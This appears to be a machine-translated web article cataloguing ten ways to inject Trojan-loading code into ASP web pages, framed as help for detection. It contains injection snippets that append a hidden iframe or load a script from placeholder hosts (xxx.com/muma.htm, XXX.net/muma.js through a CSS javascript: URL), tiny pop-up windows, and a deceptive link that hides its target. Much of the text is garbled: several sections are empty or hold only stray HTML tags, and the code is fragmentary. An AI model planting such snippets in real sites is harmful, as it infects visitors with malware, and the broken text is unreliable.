A summary of the ways to mount a horse in Asp

Author：Eve Cole Update Time：2025-03-06 16:48:02

This article tells you the methods that bad guys often use to hang Trojans on web pages, so that you can prevent your own web pages. As long as you detect these places that are often used to hang Trojans, it is easy to find the location of the Trojans.

1: Frame hanging horse

You can enter malicious website links at the address, etc.

Two: js file mounting

As long as it is a JS file, it can be maliciously modified and thus be linked to malicious code. Generally, JS code that is referenced by the entire site is most likely to be linked to Trojan horses. For detection, we can look at the left or bottom of the JS code. Bad guys like to combine malicious code with Normal codes are hidden with a lot of spaces or carriage returns, so you should check to see if the JS code page has been intentionally stretched.

Three: js deformation encryption

muma.txt can be changed to any suffix

Four: body hanging horse

Five: Hidden horse hanging

top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';

Six: Horse hanging in css

body {

background-image: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}

This method is more ruthless and harder to detect.

Seven:JAJA hanging horse

window.open (address,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);

</script>

Eight: Picture disguise

<html>

</html>

Nine: Disguise call

</frameset>

Ten: Advanced Deception

<a href=http://www.163.com (confuses the connection address and shows that this address points to the Trojan address) onMouseOver=www_163_com(); return true;> Content to be displayed on the page</a>

function www_163_com ()

{

var url=net horse address;

open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, top=10);

}

</SCRIPT>